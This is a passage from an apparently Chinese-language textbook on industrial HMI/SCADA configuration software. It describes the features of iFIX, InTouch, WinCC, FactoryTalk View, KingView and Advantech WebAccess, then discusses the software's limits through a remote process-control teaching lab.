(2)组态软件本身是开放系统,即采用组态软件开发的人机界面要能够通过标准接口与其他系统通信,这一点在目前强调信息集成的时代特别重要。人机界面处于综合自动化系统的最底层,它要向制造执行系统等上层系统提供数据,同时接受其调度。此外,用户自行开发的一些先进控制或其他功能程序也要通过与人机界面或实时数据库的通信来实现。 现有的组态软件一方面支持ODBC数据库接口,另一方面普遍符合OPC规范,它们既可以作为OPC服务器,也可以作为OPC客户机,这样可以方便地与其他系统进行实时或历史数据交换,确保监控系统是开放的系统。 6)多样化的报警功能 组态软件提供多种不同的报警方式,具有丰富的报警类型,方便用户进行报警设置,并且系统能够实时显示报警信息,对报警数据进行存储与应答,并可定义不同的应答类型,为工业现场安全、可靠运行提供了有力的保障。 7)良好的可维护性 组态软件由几个功能模块组成,主要的功能模块以构件形式来构造,不同的构件有着不同的功能,且各自独立,易于维护。 8)丰富的设备对象图库和控件 对象图库是分类存储的各种对象(图形、控件等)的图库。组态时,只需要把各种对象从图库中取出,放置在相应的图形画面上。也可以自己按照规定的形式制作图形加入到图库中。通过这种方式,可以解决软件重用的问题,提高工作效率,也方便定制许多面向特定行业应用的图库和控件。 9)丰富、生动的画面 组态软件多以图像、图形、报表、曲线等形式,为操作员及时提供系统运行中的状态、品质及异常报警等相关信息;用大小变化、颜色变化、明暗闪烁、移动翻转等多种方式增加画面的动态显示效果;对图元、图符对象定义不同的状态属性,实现动画效果,还为用户提供了丰富的动画构件,每个动画构件都对应一个特定的动画功能。 5.5 主要的组态软件介绍 5.5.1 iFIX Intellution公司以Fix组态软件起家,1995年被爱默生收购,2002年爱默生集团又将Intellution公司卖给GE Fanuc公司(该公司现已解体,iFIX归GE)。iFIX是全球领先的HMI/SCADA组态软件,在包括冶金、电力、石油化工、制药、生物技术、包装、食品饮料、石油天然气等各种工业应用当中。iFIX提供了生产操作的过程可视化、数据采集和数据监控功能,它可以精确地监视、控制生产过程,并优化生产设备和企业资源管理,能够对生产事件快速反应,减少原材料消耗,提高生产率,从而加快产品对市场的反应速度,提高用户收益。 iFIX是GE Fanuc过程处理及监控产品中的一个核心组件。它可以为数据采集及管理企业级的生产过程提供一整套的解决方案。iFIX的功能和特性包括: (1)对象与对象的连接—由于VBA已经嵌入iFIX的内部结构之中,所以许多工作就避免了用户编程。例如可以在工作台内嵌入一个仪表的ActiveX控件,并连接一个数据库点,立刻实现数据值的动态显示,无需任何编程。 (2)标签组编辑器—标签组可以显著地节省宝贵的系统开发时间。当打开一个画面或切换当前画面时,系统可以读取标签组文件,并且使用其中所定义的过程值替代图中的标记。一个画面可以定义多个标签组但其中的值并不限制在同一数据库中。 (3)调度处理器—Event Scheduler是一个计划调度处理器,允许用户基于特定的时间或时间间隔及某一事件的触发执行某些任务。例如,当某数据点超过特定值后替换当前画面,或运行一个脚本程序并产生相应报表。在 Event Scheduler中可以建立、编辑、监视、运行基于时间或基于事件的调度计划,这些调度计划均可以以前台或后台任务方式运行。 (4)功能键编辑器—自定义用户功能键,在 Intellution 工作台运行模式下,通过键盘按键激活一段VBA程序代码,执行相应动作序列。功能键既可以全局有效,也可与某个画面或画面中的某一对象相关联。功能键编辑器提供一种简捷的方法定义及修改功能键。 (5)在线组态—iFIX最大限度地发挥在线组态功能。对过程数据库、图形及其他应用程序进行在线修改、增加时,无需关闭或重新启动iFIX,并不影响正常生产过程。 (6)历史数据处理—iFIX自动采集、存储、显示历史数据,分析过程趋势,为官方的查询提供相应的文档依据,此外还能监视产品特性变化,分析设备性能,节省大量时间和资金。 (7)趋势显示—iFIX的图表对象 (Chart Object) 将历史数据和实时数据集成于图表内,并且可以为每支笔分配多个时间段。同一张图表对象内可添加的笔数是不受限制的,对于实时数据源,图表对象不仅支持表达式计算,而且有丰富的对象颜色和属性选择。X、Y轴还可单独组态定义,在运行环境下调整它们的属性。使用表组向导(Chart Group Wizards)可生成多种历史图表。 (8)灵活的报表—iCore和即插即解决结构为用户提供多种报表生成方案。例如,可以通过标准的SQL或ODBC连接,向关系数据库导出iFIX数据,生成报表。另外,Crystal Report 的运行动态连接库已经包含在了iFIX内。 (9)报警管理—iFIX方便、灵活、可靠、易于扩展的报警系统可报告系统活动及系统潜在的问题,保障系统安全运行。iFIX分布式报警管理提供多种报警管理功能,包括:无限的报警区管理、基于事件的报警、报警优先级、报警过滤功能,以及通过拨号网络的远程报警管理。另外iFIX还可以自动记录操作员操作信息,并作为非关键性报警信息发送,而无需确认。 (10)画面缓存—画面缓存能优化画面操作性能。用户可以设置画面缓存的大小,以及哪些画面可以在启动时就加载到缓存中。 (11)iFIX 实时显示—iFIX图表对象可以显示来自文件或数据库的实时数据、历史数据和文档数据及实验数据。用户可以选择在组态或运行环境中更改属性、颜色及翻卷方向。 (12)高性能和开放性—iFIX基于多种工业标准之上,提供了非常好的系统易用性和扩展性,极大地方便了系统集成。 (13)全局技术—iFIX的全局技术使得对一点的修改可以在整个应用内发生作用,减少开发时间。全局技术包括全局变量、全局颜色变化表以及全局 VBA子程序等。所有iFIX的向导使用的都是全局子程序。 (14)备份和恢复—iFIX的备份和恢复向导方便了用户管理工程文件,通过使用向导,用户可以指定文件备份并压缩,之后恢复到需要的iFIX节点。 (15)安全容器 (Secure Containment)—采用专利技术,保证嵌入系统中的任何一个ActiveX控件出错时不会对系统造成不可预料的错误。完全避免数据丢失、控制过程的中断以及由此所造成的损失。 (16)使用VBA构造图符—当图符触发编辑事件,用户可以通过VBA脚本编辑图符。定制用户化的属性,编辑窗体指定图符动态特性。属性编辑窗体可放置在全局页,这样只要打开图符便可弹出编辑窗体,以便随时更改设置。 (17)安全管理—iFIX提供系统安全级管理。在iFIX内,应用程序的调用,操作画面显示,事件调度,配方管理,都可以赋予权限管理。除此之外还能限制某些关键程序的访问,如过程数据库的重装及过程数据库的写入操作。 (18)冗余功能—iFIX提供了强大而灵活的多重冗余功能,保证系统的不间断监控,包括备份SCADA服务器、LAN冗余以及利用网络状态服务器和iFIX诊断显示程序监视、控制网络运行状态。此外,在主服务器和备用服务器同时启动、运行时,iFIX实现报警同步,避免对同一报警的重复响应。 (19)捕捉电子签名—签名对话框提供了一个操作员动作的描述。签名者可以选择一个预定义的列表注释,或者填写自己的注释。动作也能配置成捕获一个验证了的签名。签名对话框能与电子记录(报告什么人、什么动作、什么时候、为什么被操作)相维系。 此外,iFIX还具有即插即解决功能,并且支持OPC、ODBC/SQL等。 5.5.2 InTouch Wonderware的InTouch HMI 软件可用于可视化和工业过程控制,它提供了极高的易用性和易于配置的图形。通过使用其强大的向导,Wonderware智能符号使用户可以快速创建并部署自定义的应用程序,连接并传递实时信息。其灵活的架构可以确保InTouch 应用程序满足客户目前的需求,并可根据将来的需求进行扩展,同时还能保留原来的工程投资和成果。这些通用的InTouch应用程序可以从移动设备、瘦客户端、计算机节点、甚至通过Internet 进行访问。此外,InTouch HMI具备相当的开放性和可扩展性,提供了强大的连接功能,可与同行业内的各种自动化设备相连接,适用范围广泛。InTouch的技术特色主要表现在以下6个方面。 1)分布式应用特点 InTouch 软件功能丰富、运行稳定,是单独运行的应用程序的理想选择;在分布式“网络应用程序开发”(NAD) 环境中,它也可以扩展到成百上千的节点上。通过使用一个网络服务器,NAD功能集中了InTouch主应用程序的维护。每个客户端节点制作一个主应用程序的就地备份,从而可以提供强大的冗余。如果没有服务器,客户端节点可以依旧保持运行,即使用应用程序的就地备份来运行。有了服务器后的再连接是透明和无缝的。NAD 允许用户不关掉运行的 InTouch 应用程序就能够接受客户端节点的InTouch应用程序改变。 2)图形用户界面 (GUI) InTouch软件支持用户为他们的过程快速、方便地开发定制的图形视图。用户可以在InTouch Window Maker 中使用多种工具开发图形,这些工具包括标准的图形组件、位图图像、ActiveX 控件、以及符号工厂 (Symbol Factory),Symbol Factory 是一个高级图形库,它包含数以千计的预先配置的工业图形。 所有这些工具都非常易于使用和直观,因此,用户可以快速开发和部署可视化应用。 3)强大的QuickScript 使用QuickScript 编辑器可以扩展和定制InTouch 应用,以满足特定的系统需求。 可以根据众多的参数配置脚本,例如特定的工艺条件、数据变化、应用事件、窗口事件、键盘敲击事件、ActiveX 事件等。QuickScript环境还支持QuickFunctions,它们允许用户开发一个可重用的脚本库,从而简化应用,减少初始工程和应用维护时间,简化应用部署。 QuickScript 编辑器非常简单易用,它允许用户制定所有的应用过程。 在生成脚本时,用户可以在带有常用表达式和结构(如>、<、for…next 和if…then else)的按钮上点按。高级功能(如数学函数、字符串转换函数等)可以通过向导调用,在调用这些高级功能时,系统会提示用户输入必需的参数,保证函数语法的正确性。 内嵌的验证引擎允许用户在部署脚本之前对其进行验证,防止运行时出错。另外,对于更高级的用户,还可以在脚本编辑器中编写和编辑脚本,或者从其他应用中剪贴,这样有助于重用和节省设计时间。 4)广泛的I/O驱动支持 InTouch 提供了大量的I/O 服务器,支持用户连接任何工业自动化控制设备。所有的Wonderware I/O Server都为InTouch 应用提供了微软公司的动态数据交换(DDE)通信能力以及Wonderware 的SuiteLink 协议。FactorySuite 工具包还支持开发新的或私有的I/O 或SuiteLink 服务器。Wonderware 还支持OPC规范,InTouch和其他的FactorySuite 组件都能够作为OPC 客户机。 5)分布式的历史信息 InTouch 软件包括一个分布式的历史趋势系统,该系统允许用户动态地为每个趋势图表笔指定一个特定的历史文件数据源。这样,操作员可以在同一个趋势图中观察本地InTouch历史和IndustrialSQL Server上的历史信息。分布式的历史趋势能力使用户可以在一个屏幕上快速分析历史信息,在节省时间的同时能够更好地分析多个变量。 6)报警的3个视图 (1)分布式的报警显示—分布式的报警对象支持操作员在运行时选择和预先配置报警视图。这种显示给出摘要(当前)的报警信息。 (2)数据库观察器控件—数据库观察器控件显示已经记录到InTouch 报警日志数据库 (Alarm Logger Database)中的报警。 (3)报警观察器控件—报警观察器控件是一个ActiveX 控件,它同时提供摘要(当前)报警信息和历史(会话)报警信息。报警观察器支持操作员按照运行时的重要的优先级排序报警消息,且用户对系统中的当前报警和历史报警信息的检索具有控制能力。 5.5.3 WinCC SIMATIC WinCC(视窗控制中心)是西门子公司在自动化领域中的先进技术和Microsoft的强大功能相结合的产物。它有各种有效功能用于自动化过程,是用于个人计算机上的,按价格和性能分级的人机界面和SCADA系统。图5.8所示为WinCC开发系统的界面。SIMATIC WinCC是第一个使用32位技术的过程监视系统,具有良好的开放性和灵活性。可以容易的结合标准和用户程序生成人机界面,准确的满足实际要求。WinCC具有以下系统特性: (1)SIMATIC WinCC是一个通用的系统。WinCC在自动化领域中可用于所有的操作员控制和监控任务.WinCC可将过程和生产中发生的事件清楚地显示出来。它显示当前状态并按顺序记录。所记录的数据可以全部显示或选择简要形式显示,可连续或按要求编辑,并可输出。WinCC提供各种功能块用于以上这些功能,以及图形显示,结合各用户程序、信息处理、测量值处理、配方参数和报表。 图5.8 WinCC开发环境窗口 (2)SIMATIC WinCC功能可随任务增加。软件的特殊功能做成可选软件包,客户可以单独选购,适用于数据和功能的扩展。例如,通过服务器可选软件包,可以将已有的单用户组态系统扩展成一个多用户系统。 (3)SIMATIC WinCC人机界面和SCADA是为全球用户开发的自动化领域中先进技术的产品。SIMATIC人机界面产品具有在线语言切换功能,这种功能在过程操作中不但对图表信息和测量值,而且对于配置软件都有效的。WinCC有五种语言可供选择,允许用户在系统安装中选择合适的语言。此外,你能在合适的语言环境中设计运行界面。很容易适应各个国家的用户需求。 (4)SIMATIC WinCC保证数据的完整性。通过两个冗余的工作站,WinCC提供连续的文档数据选择和系统操作的安全保证。在一个服务器受干扰后系统切换客户机到其他服务器上,以确保连续操作。当故障的服务器重新启动,两台服务器的文档自动匹配,以保证文档数据不中断。 (5)SIMATIC WinCC是全面开放的软件。WinCC是在Microsoft Windows 2000/XP或Windows NT 4.0/5.0操作系统下,在PC上运行的面向对象的一流的32位应用软件。WinCC可通过OLE和ODBC视窗标准机制,作为理想的通信伙伴进入Windows世界。因此可容易地结合到全公司的数据处理系统中。WinCC不仅是数据开放,系统功能也是开放的,这就意味着系统开发人员可用WinCC为基础开发有关的应用软件,或编写扩展功能。 SIMATIC WinCC主要包括计算机(Computer)、标签管理(Tag Management)、数据类型(Data Type)和编辑器(Editor)四大部分。其中计算机一项是对计算机进行有关的设置;标签管理是对标签进行初始化定义;数据类型是对标签所代表的数据类型进行定义;编辑器则是最为主要的部分,它主要包括以下几个部分: (1)图形编辑器(Graphics Designer)。WinCC的图形编辑器用来处理过程操作中所有屏幕上的输入信号和输出信号。图形编辑器提供了一个标准图库,用户也可以自己制作图形,还可以在图形中使用OLE对象将在其他软件中设计的对象或图库中的对象调到图形编辑器中。所有图形对象的外观都可动态的进行控制。图形的几何形状、颜色、式样、层次都可通过过程制定或直接通过程序来定义和修改。 (2)报警存档(Alarm Logging)。报警存档用于监控生产过程事件,来自自动化系统事件及WinCC系统事件,并进行处理。它用可视和可听的方式显示所记录的事件,并可以打印下来。WinCC的报警存档可以自由定义,因此,它可以满足特殊系统的特殊要求。 (3)标签存档(Tag Logging)。WinCC除了可以显示当前状态,还能根据需要记录经济、技术数据。通过分析和评估这些数据可以保证操作进程有一个清晰的全貌。标签存档可以记录单个测量点或一组测量点的测量值。为安全起见,数据被存储于硬盘中。用户可以用不同的方法来记录测量值,例如可以循环的记录或由事件进行触发来记录。存档值可以用趋势图或表格形式来表示,既可以在屏幕上表示,也可以打印成报表。 (4)全局脚本。全局脚本就是C语言函数和动作的通称,用于给对象组态动作并通过调用系统内部C语言编译器来处理。它为用户提供一个C语言的编程环境。利用它编辑的C函数可以用于WinCC内的任何地方,如连到监控画面的对象上或用于数据记录。 (5)用户管理器。用户管理器用于分配和控制用户的单个组态和运行系统编辑器的访问权限,对于一个生产过程,登录和WinCC操作可以被禁止,以防止非法访问。每建立一个用户,就设置了WinCC功能的访问权限并独立的分配给此用户,至多可分配999个不同的授权。 (6)报表系统(Report Designer)。WinCC提供了一套集成的报表系统,能将WinCC里的数据打印输出,输出的页面格式是自由的,用户可进行自定义。可以同时设定3个打印机,每一个打印任务可以对应一个自己的打印机,如果该打印机失败,预先设定的打印机就会接替这个打印任务。 5.5.4 罗克韦尔FactoryTalk View Studio 2013年初,罗克韦尔自动化推出最新7.0版的FactoryTalk View Studio组态软件套件,包括用于开发和测试机器级应用的软件FactoryTalk View Machine Edition(ME)与现场级人机界面应用的组态软件FactoryTalk View Site Edition(SE)。该软件为制造商尤其是过程行业制造商提供更强的功能以及更好的操作体验。该版本软件报警管理更高效、安装更简单,能够进一步提升用户体验,并在多种生产环境中实现集成数据的共享。 FactoryTalk View SE 7.0软件可在单一系统中支持更多HMI客户端和服务器,从而扩大了支持FactoryTalk View SE报警子系统FactoryTalk报警和事件的系统规模。新的FactoryTalk报警和事件报警子系统已经符合ISA报警标准,并且支持搁置状态。 最新版本还在安装过程和设计环境方面做了很大改善。FactoryTalk View SE和ME软件简化了新的安装工作流程,可自动安装各个FactoryTalk View组件,从而缩短安装时间。在设计时间方面,FactoryTalk View Studio设计环境具有全新查找和替换功能,用户可针对HMI和全局对象显示画面,在多个服务器和画面范围内查找和替换标签或字符串。 添加了与市面上Web浏览器功能类似的导航按钮,操作员可借此更快速、更直观地导航各个画面,解决生产问题。客户端工作站可跟踪操作员打开的各个画面,同时操作员也可使用导航按钮快速地显示并浏览导航历史画面。FactoryTalk View7.0软件还增强了绘图能力,借助浓淡绘制法和对PNG格式图形的支持,为操作员提供更为逼真的过程视图。 FactoryTalk View SE Station软件具备全新的网络选件,可使单一计算机HMI更好地与FactoryTalk Historian SE和ME软件等产品集成。全新的FactoryTalk View SE Station软件联网后,用户可以直接在操作员工作站浏览FactoryTalk Historian SE服务器,选择标签并查看这些标签的历史信息。 FactoryTalk View ME7.0软件可为Panel View Plus6操作员终端应用提供更好的设备连接和诊断功能。Panel View Plus6操作站可直接连接智能过载继电器或电力监测器等非控制器设备,并显示这些设备中的数据,节省控制器的内存空间。FactoryTalk View ME7.0软件还具备全新的ActiveX控件和运行时功能,使得操作员可以直接在显示画面中查看Panel View Plus终端的诊断信息,例如温度、负载、电池电压和网络IP设置等。 FactoryTalk View 的主要特点有: (1)使用FactoryTalk View Site Edition,可以用一种映射工厂或过程的方式来分配应用项目的各个部分。分布式应用项目可以包括几个服务器,它们分布于网络上的多台计算机上。多个客户端用户可以从网络上的任何位置同时访问该应用项目。 (2)为工厂或者过程创建单机的应用项目,这些过程自成一体,并且与过程的其他部分之间没有关联。 (3)使用专业的面向对象的图形和动画来创建和编辑图形显示画面。简单的拖拽和剪切复制技术可以简化应用项目组态的操作。 (4)使用来源于图形库的图形,或者从其他的绘图包(例如CorelDRAW和AdobePhotoshop)导入文件。 (5)使用FactoryTalk View的ActiveX包容功能来使用先进的技术。例如:将Visual Basic ActiveX控件或其他的ActiveX对象嵌入图形显示画面来扩展FactoryTalk View的功能。使用FactoryTalk View SE Client Object Model(FactoryTalk View SE客户端对象模型)和VBA与其他Windows程序(如Microsoft Access和Microsoft SQL Server)共享数据,与其他Windows程序(如Microsoft Excel)数据交互,并且自定义和扩展Factory Talk View以适应用户的特殊需求。 (6)使用FactoryTalk View高效的工具快速开发应用程序,例如:直接引用数据服务器标签、Command Wizard(命令向导)、Tag Browser(标签浏览器)。 (7)避免重复输入信息。使用PLC Database Browser (PLC数据库浏览器)将A-B PLC或者SLC的数据库导入。利用FactoryTalk View的直接标签应用功能,可直接使用那些存在于控制器或者设备中的标签。 (8)使用FactoryTalk View报警通知功能来监视具有多种严重程度的过程事件。创建多个报警汇总,以便为整个系统提供除了查看报警以外的特殊报警数据。 (9)创建反映过程变量与时间之间关系的趋势图。在每个趋势中都可以显示多达100条画笔曲线(标签)的实时或历史数据。 (10)将数据同时记录到FactoryTalk诊断日志文件和远程ODBC数据库中,以便提供产品数据的各种记录。 (11)用户还可以使用第三方的程序(如Microsoft Access和Seagate Crystal Reports)直接查看或者操作ODBC格式的日志数据,而不用转化这些文件。 (12)通过禁用Windows键盘来锁定操作员只能够进行FactoryTalk View SE Client (FactoryTalk View SE客户端)操作,从而防止操作员运行其他程序或进行其他操作,影响计算机系统稳定,或因进行上述操作而影响了正常的工作。 5.5.5 组态王 组态王是北京亚控科技公司开发的组态软件产品,目前最新的版本是6.55系列。组态王系列产品是国产组态软件中市场占有率最高的产品,在大量的中、小型监控系统开发中得到了应用。组态王企业版适用于大型且网络结构复杂的工程需求,它具有模型应用、远程集中管理部署、多人同时开发、分层分布式网络、强大数据采集和处理等功能。组态王企业版在标准版基础上,具有更强大的网络功能,并可以结合工业库进行更大规模项目的实施。组态王企业版可应用于各种市政工程、石油管道输送、交通地铁站等地域广泛并需要集中进行实时控制的大型网络系统中,具有稳健的网络结构、便利的开发环境、可靠的数据采集功能,其主要功能特性如下: · 可视化操作界面,真彩显示图形、支持渐进色、丰富的图库、动画连接。 · 强大的灵活性,拥有全面的脚本与图形动画功能。 · 可以对画面中的一部分进行保存,以便以后进行分析或打印。 · 变量导入/导出功能,变量可以导出到Excel表格中,方便的对变量名称等属性进行修改,然后再导入新工程中,实现了变量的二次利用,节省了开发时间。 · 强大的分布式报警、事件处理,支持实时、历史数据的分布式保存。 · 强大的脚本语言处理,能够实现复杂的逻辑操作与决策处理。 · 全新的WebServer架构,全面支持画面发布、实时数据发布、历史数据发布以及数据库数据的发布。 · 方便的配方处理功能。 · 丰富的设备支持库,支持常见的PLC设备、智能仪表、智能模块。 · 提供硬加密及软授权两种授权方式。 组态王系列产品的主要技术亮点有以下几点。 (1)强大的数据存储能力。 组态王集成了对KingHistorian的支持,极大的提高了组态王的数据存储能力,能够更好的满足大点数用户对存储容量和存储速度的要求。KingHistorian是亚控新近推出的独立开发的工业数据库。具有单个服务器支持高达10万点、支持256个并发客户同时存储和检索数据、每秒检索单个变量超过30 000条记录的强大功能。能够更好的满足高端客户对存储速度和存储容量的要求,完全满足了客户实时查看和检索历史运行数据的要求。 (2)广泛设备支持。 组态王已能连接PLC、智能仪表、板卡、模块、变频器等上千种工业自动化设备。通讯方式灵活多样,为用户提供了充足的选择空间,可以适应各种设计方案的需要。目前,组态王支持的通信方式已包括: · 串口通信方式。 · 以太网方式。 · GPRS通信方式。 · Lonworks现场总线方式。 · BacNet现场总线方式。 组态王为第三方软件提供了多种访问组态王工程数据的接口,可以方便的对采集上来的数据进行二次计算,应用各种先进的算法,以满足工程上的特殊需要。其支持的通信接口主要包括: · OPC2.0。 · DDE。 · 通过OCX控件的方式开放实时数据。 · 通过Excel表格访问历史数据。 (3)改进的温控曲线控件。 组态王内嵌的温控曲线控件,产品更加符合工程开发者的使用习惯,主要功能包括: · 可以在运行状态下方便的修改每一段温控曲线的设定值。 · 设定曲线可以有多条,运行时可以重新加载。 · 不需在工程中建变量,温控控件可以直接和设备中的内存区对应,节省了建变量的时间,支持批量下载,支持20条实时曲线。 (4)优化的历史库。 · 通用历史趋势曲线的每条曲线都可以定义自己Y轴单位和范围,并且Y轴坐标能够根据曲线区域数据的最大值,最小值进行自动调整。 · 增加了对关机时刻和通信失败时历史数据的处理。 · 增加对I/O变量可按照每次采集进行存储的功能。 · 当磁盘的空间小于设定值时会有相应的提示。 · 改进了历史数据的存储算法,存储速度更快。 (5)数据词典变量的导入/导出功能和变量名替换功能。 (6)配方管理功能。 (7)组态王工程打包工具。 (8)组态王集成的报表系统。 5.5.6 WebAccess 1.Advantech WebAccess组成 WebAccess最早由美国BroadWin公司开发,从2006年起研华科技与BroadWin公司开展合作,全面负责其在中国大陆的业务,并以Advantech WebAccess作为产品名称。与传统的组态软件不同,Advantech WebAccess是完全基于浏览器的SCADA网络组态软件,采用IE浏览器进行组态,实现真正的远程监控与开发,在线下载等网络功能。WebAccess网络结构如图5.9所示。其基本组成包括以下方面: 图5.9 WebAccess的网络结构 (1)监控节点(SCADA node)—负责数据采集和本地监控,并且可以通过网络传输数据;同时负责实时和历史趋势记录,报警记录以及事件运行记录。 (2)工程节点(Project node—WebAccess开发平台,所有系统设置及前期项目开发均在此完成;作为Web服务器,提供客户端和监控节点间的初始化连接;作为数据库服务器,通过ODBC记录所有运行数据。 (3)客户端(Client)—基于浏览器的ActiveX插件程序,具有与监控节点同步的监控能力,它所显示的每张图面都拥有实时数据的动态图面,并且可以通过浏览器查看实时和历史趋势图、报警记录以及报表等,而且允许更改点值,确认报警和实时控制。 (4)瘦客户端(Thin Client)—运行于WindowsCE操作系统,无需安装任何WebAccess相关软件,通过IE浏览器以位图格式显示监控界面并以文本方式改变参数值、确认报警和监控。 2.Advantech WebAccess功能与特点 除了传统组态软件的功能,WebAccess还具有一些特色功能,主要包括以下方面。 1)强大的网络发布与远程监控系统功能 (1)基于Web浏览器的工程开发环境—通过使用Web浏览器(如IE6.0),可以完成整个工程的创建与运行。WebAccess对所有工程的创建、组态、绘图与监控运行都可通过浏览器实现。 (2)基于Web浏览器的客户端既可监视又可控制—通过使用浏览器,远程用户也可以对工厂制造、程序控制、水利调度及楼宇自动化系统中的自动化设备进行实时监视和控制。传输的数据是实时的,画面也是实时的,随着数据更新而更新,实现了远程与本地监控同等的效果。 (3)强大的远程诊断、维护功能—WebAccess区别于其他软件的最大特点就是,全部的工程组态、数据库设置、图面制作和软件管理都可以通过Internet或Intranet在异地使用浏览器完成。当现场出现异常状况或需要及时修改时,工程维护人员无论身在何处,都可以通过网络及时的做出调整,让工程维护工作变得及时、高效,并降低了工程维护成本。 (4)中央数据库服务器—工程节点是一个配置数据的中央数据库服务器。所有监控节点的组态资料都在工程节点中被复制并保存起来。如果资料在监控节点中丢失,你可以通过WebAccess将其从工程节点下载至监控节点。工程节点还作为ODBC数据库服务器,提供历史数据的长期存储。网络特性提供了多样的节点安装方式,而且可以在网络中的一处或多处使用浏览器更新所有的节点。 (5)分布式结构体系—每个监控节点(SCADA node)都可以独立运行或与其他监控节点组合在一个大型工程中,可以互相监控,实现数据共享。每个监控节点都提供警报、数据记录、报表、计算和其他一些SCADA特性。每个监控节点都拥有自己的图面列表和一个运行数据库。 (6)严密的网络安全体系—WebAccess可以将用户划分为多种类型,不同的用户类型具有不同的界面访问权限;同时还使用了区域和等级的概念以保护I/O点。一个I/O点可以被指定在某一个区域中的某一个安全等级,而用户可以被指定在多个区域从而拥有不同的安全等级。在监控时,如果用户需要修改某个I/O点的值时,该用户的用户类型必须拥有可以更改该点值的能力,即他在该区域拥有的安全级别必须高于该点的安全等级。 (7)监控节点冗余—监控节点冗余由主要监控节点和备份监控节点组成。工程管理员将组态资料分别下载至这两个监控节点。在核心程序启动时,主要监控节点和备份监控节点之间将保持通信,但只有一个会连接到硬件设备。数据记录和趋势图会同时在主要监控节点和备份监控节点保存,有效的防止了数据丢失。如果主要监控节点通信失败,备份监控节点将自动接手与硬件设备通信。客户端在主要监控节点通信失败后立即自动指向备份监控节点,获取实时动态数据。当主要监控节点恢复正常后,硬件设备和客户端都会自动重新连接到主要监控节点,而且主要监控节点在故障时所缺的数据也会自动由备份监控节点传到主要监控节点,保证了数据的完整性。 2)具有B/S结构组态软件的特色功能 (1)多工程师非同步的网络开发功能—网络开发特性允许多个工程师通过网络对同一台服务器同时进行项目开发,无需网络间重复的文件复制工作,大大提高工作效率。 (2)实现与上层管理调度系统的无缝链接—WebAccess可以很方便的以HTTP超链接的方式被管理系统调用,将WebAccess的监控页面嵌入管理系统当中,实现与上层管理调度系统的无缝链接。 (3)矢量绘图格式—WebAccess使用的是矢量图,相对于采用非矢量图的组态软件,它具有容量小、无极缩放,不失真等特点,在网络传输时可以实现更高的实时性。而且随着显示分辨率的提高,画面显示效果更加完美。 (4)导入AutoCAD DXF—WebAccess可以将AutoCAD所绘制的图形以DXF文件形式导入到WebAccesss中。经DXF文件导入的图像与利用WebAccess的绘图程序绘制出来的图像完全相同,所有的二次修改、动画等操作都可以继续使用。 (5)丰富的脚本语言—WebAccess目前支持TCL Script、VBScript和Jscript三种脚本语言,方便不同用户的使用选择。TCLScript脚本语言是建立在开放性源编程语言TCL基础上,支持所有8.4版本以上的嵌入式TCL指令。VBScript和Jscript是基于微软的VBScript 和Jscript之上脚本语言。 (6)集成视频—WebAccess提供了一个网络视频设备的接口,支持通过ActiveX Control(OCX)使用网络摄像机(Web Camera)传送现场实景,允许用户在客户端监视设备的运行状况。 (7)时间调度—WebAccess提供按预定时间工作的运行模式,使设备的I/O点按预先设置的假日、工作时间和开关周期工作,实现定时还原和控制功能。还可以随时在线调整调度计划。 (8)E-mail方式发送报警信息和报表—当有报警发生时,WebAccess能够发送报警信息到预先设定的电子邮箱,也可以通过回复邮件进行报警确认。还可以将报表数据发送到指定邮箱,并且该报表数据可以被复制和粘贴到EXCEL、WORD和其他一些通用Office应用程序中。 此外,WebAccess的开发版和客户端是免费的。 5.6 组态软件的局限及功能扩展 5.6.1 组态软件的功能局限性 采用组态软件开发SCADA系统人机界面具有快速、高效的特点,生成的应用系统在功能、可靠性、开放性和扩展性上也有很高的性能。不仅如此,许多小型的数据采集、记录系统也普遍使用组态软件来开发。然而,采用组态软件开发监控系统人机界面毕竟属于二次开发,即系统的功能在很大程度上受制于组态软件功能的局限性。这里以采用组态王软件开发的一套基于Internet的过程控制远程实验系统为例作介绍。 该系统结构如图5.10所示。从系统结构上看,这也是属于支持Internet应用的SCADA系统。它由双容水箱实验装置、基于PLC的实验过程测控系统、音频/视频服务器、Web服务器、远程实验工作站和管理员工作站(具有Web浏览器的客户端)等组成。Web服务器配置独立的IP地址,实验工作站通过Internet与Web服务器连接。Web服务器接受远程实验工作站的实验请求,控制实验装置完成相应的实验过程,并将实验过程数据、实验结果通过Internet传送给远程的实验者,使得远程实验者通过网络远程操纵实验设备,远程观察实验过程,远程分析实验结果,还能够自动管理实验室的照明灯光。基于PLC的测控系统是整套远程实验系统的控制中心,它实现对整个实验流程的控制。远程实验者还可以通过音频/视频服务器获得实验装置现场的声音和视觉图像,通过控制摄像头的转动视角、俯仰角度和调整焦距来获得实验室现场更加清晰的视觉反馈图像,增强实验操作的临场感。 图5.10 基于Internet的远程实验系统原理图 测控系统配置三菱FX2N-32MR小型PLC,并配置多台带光柱的宇光数显仪表。现场测量仪表直接与数显仪表连接,数显仪表配RS-485通信接口,与PLC上的FX2N-485-BD模块连接。在PLC中编程读/写显示仪表相应的数据区,获取检测参数的数值等信息。采用这种方式的好处是计算机上显示的流量、液位等参数数值与显示仪表的完全一致,而且还节省了A/D模块的费用。PLC中程序采用梯形图编程,实验中的PID等控制功能实现都是用梯形图软件实现,而相应的参数则是学生在浏览器上的实验操作窗口设置。PLC的编程口与运行Web服务器的计算机串口连接,Web服务器上运行的监控程序通过该串口控制实验的流程。 为了加快开发过程,采用工控组态软件—组态王编写了远程实验软件,该软件包括完整的实验界面、参数设置、实验流程显示与控制等。该软件只需要通过简单的配置就可以实现Web功能。由于组态软件采用了多线程、COM+组件等新技术,能实现多任务,系统运行稳定可靠。 然而,在开发过程中,还遇到了以下问题: (1)客户端难于提取实时实验数据。组态软件是为工业应用而开发的,因此,一旦在工业现场投入运行,就要能够连续记录所有组态变量的信息。对于实验系统来说,只要存储有用的信息,比如实验开始和结束之间的数据。组态王提供了查询历史数据的工具,可以指定查询的时间获得相关的数据。但这个功能目前无法在IE客户端使用。实际上,即使在客户端采取这种方法来提取实验数据也很不方便,因为这要求学生记录每个实验开始和结束的时间以及不同实验分析所需要的数据对应的变量名,而变量名通常只有实验系统开发人员知道,并不对操作人员开放,否则系统可靠性很难保证。 (2)对远程客户(实验学生)的控制。由于只有一套过程控制对象和相应的测控装置,因此,当有一个学生登录该系统并且开始实验后,他就独占了该系统,即不允许有其他学生再登录该系统并开展实验。虽然在组态王中可以通过一些设置来达到该目的,但由于组态王不提供关于远程客户的IP信息及有几个客户登录,因此,影响了一些高级实验功能的开发,比如多学生合作做实验、实验管理人员对参与实验学生的控制等。 